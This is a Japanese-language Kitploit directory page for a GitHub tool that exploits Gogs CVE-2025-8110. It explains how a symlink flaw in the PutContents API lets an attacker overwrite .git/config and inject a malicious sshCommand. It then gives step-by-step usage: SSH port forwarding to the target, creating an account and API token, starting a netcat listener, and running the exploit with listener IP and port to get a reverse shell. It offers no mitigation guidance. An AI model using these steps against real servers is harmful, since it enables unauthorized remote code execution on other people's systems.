Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCEエクスプロイト | Kitploit
ツール/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCEエクスプロイト

リポジトリを見る
1115ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Gogs CVE-2025-8110 RCEエクスプロイト

GogsのCVE-2025-8110に対する自動化されたPythonエクスプロイトです。この脆弱性は、PutContents APIがファイルパスがシンボリックリンクかどうかを検証しないことを悪用して、リモートコード実行(RCE)を可能にします。シンボリックリンクを介して内部の.git/configファイルを上書きすることで、悪意のあるsshCommandを注入し、リバースシェルをトリガーします。

🛠️ 前提条件

Python 3と必要な依存関係がインストールされていることを確認してください:

pip install requests rich beautifulsoup4

また、リポジトリのクローンとコミットの段階のために、gitがインストールされ、$PATHに含まれている必要があります。

⚙️ セットアップと設定

1. Gogs WebUIへのアクセス

Gogsは127.0.0.1:3001にバインドされている場合があります。ポートフォワーディングを使用してローカルでWebUIにアクセスします:

ssh -L 3001:127.0.0.1:3001 user@target-ip

2. アカウント作成

フォワーディング後、http://localhost:3001に移動します:

  • 新しいアカウントを作成します。
  • スクリプト用にユーザー名とパスワードをメモしておきます。

3. APIトークンの生成

スクリプトはGogs APIを使用してペイロードを配信します:

  1. WebUIにログインします。
  2. 設定 -> アプリケーションに移動します。
  3. 個人アクセストークンの管理で新しいトークンを生成します。
  4. トークンをすぐにコピーします。

🚀 実行

1. Netcatリスナーの起動

APIの更新が処理されるとすぐにシェルがトリガーされるため、スクリプトを実行する前にリスナーを起動します。

nc -lvnp 5555

2. エクスプロイトの実行

認証情報とトークンを引数として渡します:

python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

引数

フラグ説明
-uGogsインスタンスのベースURL(例:http://localhost:3001)。
-un作成したアカウントのユーザー名。
-pw作成したアカウントのパスワード。
-t設定で生成したAPIトークン。
-lhリスナーのIPアドレス(LHOST)。
-lpリスナーのポート番号(LPORT)。

注: スクリプトがハングしたり、"Overwriting .git/config"の後に Read timed out が返された場合は、リスナーを確認してください。これは通常、リバースシェルが正常に接続され、その接続を保持していることを示しています。


作成者: TYehan

免責事項: このツールは教育目的および許可されたセキュリティ監査専用です。責任を持って使用してください。

ツールをダウンロード